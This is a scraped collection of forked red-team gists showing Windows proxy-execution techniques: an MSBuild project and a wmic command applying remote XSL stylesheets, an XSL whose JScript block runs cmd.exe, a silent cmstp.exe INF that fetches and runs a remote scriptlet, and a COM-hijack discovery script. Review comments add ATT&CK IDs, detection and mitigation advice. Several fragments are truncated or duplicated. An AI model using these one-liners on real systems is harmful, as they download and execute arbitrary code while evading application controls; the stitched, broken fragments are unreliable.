
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<!--
  Review note: this project has a single default target, RunMe, whose only step is the
  built-in XslTransformation task. Building the project therefore applies a stylesheet
  that is downloaded at build time, inside the MSBuild.exe process.
-->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="RunMe">
<!--
  UseTrustedSettings="true" relaxes the XSLT security settings so that document() and
  embedded script blocks in the stylesheet are honoured; it is meant for trusted input only.
  XslInputPath is an https URL, so the stylesheet is fetched over the network.
  XmlContent is a small inline document (entity-escaped) and the result is written to
  delete_me.txt.
  Detection: MSBuild.exe started outside a build or CI context, making outbound HTTP(S)
  requests, or spawning child processes (ATT&CK T1127.001).
  Mitigation: application control (WDAC / AppLocker) blocking MSBuild.exe on hosts that
  do not build software; review any project file that sets UseTrustedSettings.
-->
<XslTransformation
UseTrustedSettings="true"
XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
</Target>
</Project>
RedTeams / poc.png
Created August 1, 2019 19:46 — forked from bohops/poc.png
MSBuild - Property functions -
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
- Abandoned COM Discovery Script.
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions)
# GetMissing: report COM registrations whose server path is not present on disk.
#   $server  name of the Win32_COMSetting property to inspect (the calls below pass
#            LocalServer, LocalServer32, InprocServer and InprocServer32).
#   Output   one string per hit: "<ComponentId> | <property name> | <resolved path>".
# Side effect: changes the current location to %windir%\system32\ and leaves it there.
# Defensive use: each hit is a stale registration that should be repaired or removed.
function GetMissing($server) {
    $pathByClsid = @{}

    # Presumably so that relative server paths resolve against system32 (not stated in the script).
    Set-Location $env:windir'\system32\'

    # Keep only the COM settings that actually populate the requested property.
    $registered = Get-WmiObject Win32_COMSetting | Where-Object { $_.$server -ne $null }
    $registered | ForEach-Object { $pathByClsid.add($_.ComponentId, $_.$server) }

    $pathByClsid.Keys | ForEach-Object {
        # Expand %VAR% references and strip the quotes around the registered path.
        $candidate = [Environment]::ExpandEnvironmentVariables($pathByClsid[$_])
        $candidate = $candidate.Replace('"', '')

        # Cut command-line arguments that follow an .exe path.
        if ($candidate.Contains('.exe ')) {
            $candidate = $candidate.Substring(0, $candidate.IndexOf('.exe')) + '.exe'
        }

        # Emit only the registrations whose binary cannot be found.
        if ($(Test-Path $candidate) -eq $False) {
            $_ + ' | ' + $server + ' | ' + $candidate
        }
    }
}

GetMissing('LocalServer')
GetMissing('LocalServer32')
GetMissing('InprocServer')
GetMissing('InprocServer32')
RedTeams / Inject.cs
Created August 1, 2019 19:47 — forked from bohops/Inject.cs
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
/// <summary>
/// Public parameterless constructor; its body is empty.
/// </summary>
// NOTE(review): the listing is cut off after this constructor, so the remaining
// members of TestClass are not visible here.
public TestClass()
{}
<!--
  Review note: this XSLT 1.0 stylesheet contains no templates. Its only content is an
  ms:script extension block (namespace urn:schemas-microsoft-com:xslt) written in JScript,
  which constructs an ActiveXObject and calls Run("cmd.exe") on it. The file carries
  script rather than transformation rules.
  Mitigation: script blocks only execute when the XSLT processor has scripting enabled
  (in .NET, XsltSettings.EnableScript, which is off by default); keep it disabled for any
  stylesheet that is not authored and reviewed in house.
  Detection: XSL script processing is tracked as ATT&CK T1220; look for processes that
  load a stylesheet and then spawn a command interpreter.
-->
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:u="p" version="1.0"><ms:script implements-prefix="u" language="JScript">r=new ActiveXObject("http://WScript.Shell ").Run("cmd.exe")</ms:script></stylesheet>
RedTeams / test.inf
Created August 1, 2019 19:48 — forked from bohops/test.inf
Test inf-sct execution (+++ @NickTyrer - https://gist.github.com/NickTyrer/)
;cmstp.exe /s cmstp.inf
; Review note: the line above is the author's invocation; /s makes cmstp.exe install the
; profile silently, so no dialog is shown to the user.
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
; The install section names UnRegisterOCXSection as its UnRegisterOCXs list.
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
; The single entry refers to a scriptlet (.sct) hosted at a remote URL via the script: moniker.
; NOTE(review): the gist title calls this a test; whether the INF engine acts on this
; exact line is not shown here.
; Detection: cmstp.exe run with /s against an INF from a user-writable path, or cmstp.exe
; making outbound network connections (ATT&CK T1218.003).
; Mitigation: block cmstp.exe with application control where connection profiles are not used.
GetObject("script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<!--
  Review note: the xml-stylesheet instruction above names a stylesheet served from a
  remote URL, so any consumer that honours the instruction fetches and applies content
  it did not ship with. The document body is a single customer record.
  Mitigation: treat a stylesheet reference as a code reference; configure XML/XSLT
  consumers so they do not resolve external stylesheets or run stylesheet script for
  documents from untrusted sources.
-->
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
RedTeams / wmic.xsl
Created August 1, 2019 19:53 — forked from Arno0x/wmic.xsl
Oneliner for arbitrary code download and execution
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[